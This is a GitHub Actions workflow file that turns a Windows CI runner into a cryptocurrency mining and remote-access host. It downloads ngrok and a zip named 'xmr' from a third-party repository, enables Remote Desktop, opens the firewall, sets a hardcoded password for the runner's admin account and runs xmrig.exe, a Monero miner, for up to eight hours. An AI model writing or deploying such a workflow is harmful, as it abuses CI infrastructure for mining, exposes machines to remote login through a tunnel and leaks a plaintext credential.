name: Cl

on: [push, workflow_dispatch]

jobs:
  build:
    runs-on: windows-latest
    timeout-minutes: 480
    steps:
      - name: Download
        run: Invoke-WebRequest https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-windows-amd64.zip -OutFile ngrok.zip
      - run: Invoke-WebRequest https://github.com/adityathakare1/ad/archive/refs/heads/main.zip -OutFile xmr.zip
      - run: Expand-Archive ngrok.zip
      - run: Expand-Archive xmr.zip
      - name: Auth
        run: .\ngrok\ngrok.exe authtoken $Env:NGROCK_AUTH_TOKEN
        env:
          NGROCK_AUTH_TOKEN: ${{ secrets.NGROCK_AUTH_TOKEN }}
      - name: Enable TS
        run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
      - run: Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
      - run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
      - run: Set-LocalUser -Name "runneradmin" -Password (ConvertTo-SecureString -AsPlainText "Ad@234892" -Force)
      - name: CMD
        run: .\xmr\ad-main\xmrig.exe
